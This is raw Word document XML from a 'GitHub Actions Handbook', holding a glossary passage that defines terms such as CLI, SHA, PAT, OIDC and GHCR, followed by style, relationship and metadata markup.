          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">UI — User Interface.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The visual part that humans interact with. The Actions tab is the UI for workflow runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CLI — Command Line Interface.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A text-based interface where users type commands. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">gh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> are all CLIs you'll invoke from workflow steps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Security and identity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SHA — Secure Hash Algorithm.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A family of cryptographic hash functions. Git uses SHA-1 (and increasingly SHA-256) for commit identifiers. Pinning a third-party action to a commit SHA is the most secure way to reference it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS — Hypertext Transfer Protocol Secure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP wrapped in TLS encryption. All GitHub API calls use HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PAT — Personal Access Token.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A token you create manually for authenticating with the GitHub API. Prefer the built-in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> over PATs whenever you can.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OIDC — OpenID Connect.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> An identity protocol built on OAuth 2.0. GitHub Actions can exchange a short-lived OIDC token with cloud providers (AWS, GCP, Azure) to deploy without storing long-lived credentials as secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IAM — Identity and Access Management.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The framework that decides who can do what on a system. Relevant when your workflow deploys to a cloud — the workflow needs an IAM role or service principal with the right permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GHCR — GitHub Container Registry.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> GitHub's built-in registry for container images at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">ghcr.io</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Push and pull with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — no external registry account required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Short forms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">env — Environment (variable).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A named value available to processes at runtime. Set via the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">env:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> key or written to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">$GITHUB_ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">repo — Repository.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Git repository. On GitHub, it includes the code, history, issues, PRs, Actions, and settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GH — GitHub.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> The platform. Also the name of the official CLI tool (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">gh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>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outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3864"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="8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2E75B6"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rPr>
      <w:color w:val="2E75B6"/>
      <w:u w:val="single" w:color="2E75B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8ikodevy-7t4azbauj62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crontab.guru" TargetMode="External"/><Relationship Id="rIdo1_iycwukyillpsgba5ct" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/marketplace?type=actions" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9228b2ab6b2bce65d72167b6e451bbc83a2325c0.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f62140145d7d0139b9d2a226a039387baeb9f267.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/46a961cd66e429b8ecb4d4900d07d43c71bc67ad.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/119ff2fb390409fdc324d0beb123fc16a1419323.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/38ddba1f9797275181d740009c4dcd1abf08005c.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/04960b50d1e172fd470364359f63203d242bb21b.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/92ca2cb71aef3c9f53a199754b8c8f82816dcfe6.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ca503e5efb396eb9ecad0e2523b255a736937e36.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9e2ac7ef8b3f1a1de39e6312a5822545a98a7ed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GitHub Actions Handbook</dc:title>
  <dc:creator>GitHub Actions Handbook Generator</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-28T07:54:29.038Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-28T07:54:29.039Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>